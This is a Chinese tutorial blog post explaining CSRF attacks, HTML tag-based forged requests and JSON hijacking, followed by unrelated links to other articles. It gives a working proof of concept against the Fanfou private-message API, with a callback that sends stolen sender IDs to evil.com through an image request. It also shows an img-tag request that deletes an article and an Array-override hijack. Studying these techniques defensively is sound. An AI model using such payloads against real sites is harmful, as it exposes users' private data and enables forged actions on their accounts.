什么是CSRF

CSRF,全称是Cross Site Request Forgery,也即跨站请求伪造。对于CSRF来说,它的请求有两个关键点:跨站点的请求和请求是伪造的。

跨站点的请求的来源是其他站点,当然恶意的请求也有可能来自本站,目标网站应该区分请求来源。如果请求的发出不是用户的意愿,那么这个请求就是伪造的。

一个场景

目标网站a:www.a.com

恶意网站b:www.b.com

两个域不一样,目标网站a上有一个删除文章的功能,通常用户单击“删除链接”时才会删除指定的文章,这个链接是www.a.com/blog/del?id=1,id号代表不同的文章。

如果目标网站a上存在一个XSS漏洞,执行的js脚本无同源策略限制,就可以按下面的方式来删除文章。

  • 使用ajax发出get请求,请求值是id=1,请求目标地址是www.a.com/blog/del。
  • 或者动态创建一个标签对象(如img、iframe、script)等,将它们的src指向这个链接www.a.com/blog/del?id=1,发出的也是get请求。
  • 然后欺骗用户访问存在xss脚本的漏洞页面(的目标网站a上),则攻击发生。

如果不用这种方式,或者目标网产a根本不存在xss漏洞,那么我们可以考虑csrf的思路,来删除文章:

  • 在恶意网站B上编写一个csrf页面(www.b.com/csrf.htm),想想有什么办法可以发出一个get请求到目标网站上?
  • 利用ajax是不可以的,它禁止跨域传输数据。
  • 用代码<img src=http://www.a.com/blog/del?id=1/>。
  • 然后欺骗(QQ,微博,邮箱等)已经登录目标网站a的用户访问www.b.com/csrf.htm页面,则攻击发生。

这个攻击过程的三个关键点:跨域发出了一个get请求、可以无javascript参与、请求是身份认证后的。

有何危害

  • 篡改目标网站上的用户数据
  • 盗取用户隐私数据
  • 作为其他攻击向量的辅助攻击手法
  • 传播csrf蠕虫

CSRF类型

按照攻击方式主要可以分为:HTML CSRF攻击、JSON HiJacking攻击和Flash CSRF攻击(这里略)。

1、HTML CSRF攻击

同样是上面那个场景,发起的CSRF请求都属于HTML元素发出的,这一类是最普遍的CSRF攻击。

HTML中能够设置src/href等链接地址的标签都可以发起一个get请求:

<link href="">、<img src="">、<img lowsrc="">、<img dynsrc="">、<meta http-equiv="refresh" content="0:url=">、<iframe src="">、<frame src="">、<script src="">、<bgsound src="">、<embed src="">、<video src="">、<audio src="">、<a href="">、<table background="">

...

还有CSS样式中的:

@import ""、background:url("")

当然,还有通过javascript动态生成的标签或css对象发起的get请求,而发出post请求只能通过form提交方式。

2、JSON HiJacking攻击

JSON HiJacking的攻击过程是CSRF,是对ajax响应中最常见的json数据类型进行的劫持攻击。很多时候,网站发出的ajax请求,响应回来的数据是json格式,有以下两种格式.

1)字典格式

{

"id":1,

""name":"foo",

"email":foo@gmail.com,

}

2)列表格式

["foo","xoo","coo"]

json数据如果以字典形式返回,直接在浏览器中显示会报错,原因是浏览器以为"{"开头的脚本应该是一段左右花括号包围住的代码块,所以,我们一般会这样处理:

eval("("+json_data+")");//前后加上圆括号

对于使用列表形式返回的json数据,它是一个array对象,以前可以通过劫持array数据来进行json hijacking攻击,但是现在已经不行了。

一个以前饭否的json hijacking案例:

饭否的private_message API可以显示用户私信内容,官方描述如下:

显示用户收到的私信:

路径:http://api.fanfou.com/private_messages/inbox.[json|xml]

参数:count(可选)-私信数,范围1-20,默认为20

示例:http://api.fanfou.com/private_message/inbox.xml?count=10

callback(可选)-javascript函数名,使用json格式时可用,将json对象作为参数直接调用。

示例:http://api.fanfou.com/private_messages/inbox.xml?callback=getStatuses

我们使用json格式的数据返回,并且callback函数可以自定义。接着自定义一个json hijacking页面,包含如下javascript代码:

  1. <script>
  2. function hijack(o){//自定义的劫持函数
  3. var i=0;
  4. var data="";
  5. for(i;i<2;i++){
  6. //alert(o[i].text);
  7. data+=o[i].sender_id;
  8. }
  9. alert(data);
  10. new Image().src="http://wwww.evil.com/jsonhijack.php?hi="+escape(data);//将获取到的隐私数据上传到攻击者服务器上
  11. }
  12. </script>
  13. <script src=http://api.fanfou.com/private_messages/inbox.json?callback=hijack&count=3>
  14. </script><!--api调用中使用的callback函数为hijack-->

当登录饭否的用户被欺骗访问这个页面时,其隐私将暴露无遗。第一个<script>标签内的脚本是我们自定义的劫持函数hijack,第二个<script>标签加载远程js文件,即饭否的private_message API,这个加载过程实际上是发了一个CSRF GET请求,请求带上了登录用户的Cookie身份认证信息。返回的数据如下:

  1. hijack([{
  2. "id":585904,
  3. "text":"...",
  4. "sender_id":"Salina_Wu",
  5. "recipient_id":"ycosxhack",
  6. "created_at":Sat May 31 05:00:01 +0000 2008",
  7. "sender_screen_name":"LOLO",
  8. "recipient_screen_name":"余弦"},{
  9. "id":324234,
  10. "text":"...",
  11. "sender_id":"xssis",
  12. "recipient_id":"ycosxhack",
  13. "created_at":Sat May 11 05:00:01 +0000 2008",
  14. "sender_screen_name":"xssis",
  15. "recipient_screen_name":"余弦"
  16. }])

由于hijack函数被预先劫持而定义,并且第二个<script>标签内的远程js文件返回的数据被当作javascript代码而被解析执行,这时就会执行这个hijack函数,参数就是上面hijack()中的这段json数据。

如果饭否API不允许自定义callback函数,返回的数据内容如下:

  1. [{
  2. "id":585904,
  3. "text":"...",
  4. "sender_id":"Salina_Wu",
  5. "recipient_id":"ycosxhack",
  6. "created_at":Sat May 31 05:00:01 +0000 2008",
  7. "sender_screen_name":"LOLO",
  8. "recipient_screen_name":"余弦"},
  9. //其余省略...
  10. }]

返回结果是一个Array对象,我们曾经可以通过在加载待劫持的js文件之前,先劫持住Array对象,如:

  1. <script>
  2. var jackobj;
  3. Array=function(){
  4. jackobj=this;
  5. }
  6. </script>
  7. <script src="http://api.fanfou.com/private_messages/inbox.json"></script>

CSRF学习小结的更多相关文章

  1. flex学习小结

    接触到flex一个多月了,今天做一个学习小结.如果有知识错误或者意见不同的地方.欢迎交流指教. 画外音:先说一下,我是怎么接触到flex布局的.对于正在学习的童鞋们,我建议大家没事可以逛逛网站,看看人 ...

  2. Python 学习小结

    python 学习小结 python 简明教程 1.python 文件 #!/etc/bin/python #coding=utf-8 2.main()函数 if __name__ == '__mai ...

  3. react学习小结(生命周期- 实例化时期 - 存在期- 销毁时期)

    react学习小结   本文是我学习react的阶段性小结,如果看官你是react资深玩家,那么还请就此打住移步他处,如果你想给一些建议和指导,那么还请轻拍~ 目前团队内对react的使用非常普遍,之 ...

  4. objective-c基础教程——学习小结

    objective-c基础教程——学习小结   提纲: 简介 与C语言相比要注意的地方 objective-c高级特性 开发工具介绍(cocoa 工具包的功能,框架,源文件组织:XCode使用介绍) ...

  5. pthread多线程编程的学习小结

    pthread多线程编程的学习小结  pthread 同步3种方法: 1 mutex 2 条件变量 3 读写锁:支持多个线程同时读,或者一个线程写     程序员必上的开发者服务平台 —— DevSt ...

  6. ExtJs学习笔记之学习小结LoginDemo

    ExtJs学习小结LoginDemo 1.示例:(登录界面) <!DOCTYPE html> <html> <head> <meta charset=&quo ...

  7. 点滴的积累---J2SE学习小结

    点滴的积累---J2SE学习小结 什么是J2SE J2SE就是Java2的标准版,主要用于桌面应用软件的编程:包括那些构成Java语言核心的类.比方:数据库连接.接口定义.输入/输出.网络编程. 学习 ...

  8. (转) Parameter estimation for text analysis 暨LDA学习小结

    Reading Note : Parameter estimation for text analysis 暨LDA学习小结 原文:http://www.xperseverance.net/blogs ...

  9. dubbo学习小结

    dubbo学习小结 参考: https://blog.csdn.net/paul_wei2008/article/details/19355681 https://blog.csdn.net/liwe ...

随机推荐

  1. springmvc前端控制器的三种拦截方式

    *.do :只拦截.do文件 / :拦截除jsp页面的所有请求,包括restful类型的url /*  :拦截所有请求包括jsp页面

  2. linux 高级路由

    1. 什么是高级路由? 是把信息从源穿过网络到达目的地的行为. 有两个动作:确定最佳路径,传输信息 确定最佳路径:手工指定,自动学习. 传输信息:隧道传输,流量整形 高级路由(策略路由)是根据一定的需 ...

  3. Vue百度搜索

    <!DOCTYPE html><html lang="en"><head> <meta charset="GBK"&g ...

  4. 小朋友学C语言(2):安装Dev C++编译器

    (一)编译器 编译器是将“一种语言(通常为高级语言)”翻译为“另一种语言(通常为低级语言)”的程序.一个现代编译器的主要工作流程:源代码 (source code) -->预处理器 (prepr ...

  5. ELK新手教程(二)

    暂不排版,后面整理. logstash 使用配置文件 在bin目录下创建一个名为test.conf的文件,内容为: input { stdin {} } output { stdout{} } 执行命 ...

  6. Celery 在Windows下启动worker时出现错误:ValueError: not enough values to unpack (expected 3, got 0)

    在公司Linux环境下没有出现问题,在回到家后直接在Windows10下运行出现错误: ValueError: not enough values to unpack (expected 3, got ...

  7. Linux常用操作分享

    Java开发经常遇到的linux相关操作 1.常用的上传下载(Xshell5) 1).get 从远程服务器上下载一个文件存放到本地,如下: 先通过lcd切换到本地那个目录下,然后通过get file ...

  8. js判断假值

    js中的假值:在JavaScript中,false.null.0.空字符串.undefined 和 NaN被称为假值. 需要注意的是,这种方法字符串类型会返回true哦,比如'false','0' B ...

  9. Vue-ui常用组件库整理

    Vue-ui常用组件库整理 查看全部整理内容==> element-ui Element 是由饿了么UED设计.饿了么大前端开发的一套基于 Vue 2.0 的桌面端组件库. 这款是我用了很久的, ...

  10. hadoop 问题及解决方式

    转自http://www.bkjia.com/ASPjc/931209.html 解决Exception: org.apache.hadoop.io.nativeio.NativeIO$Windows ...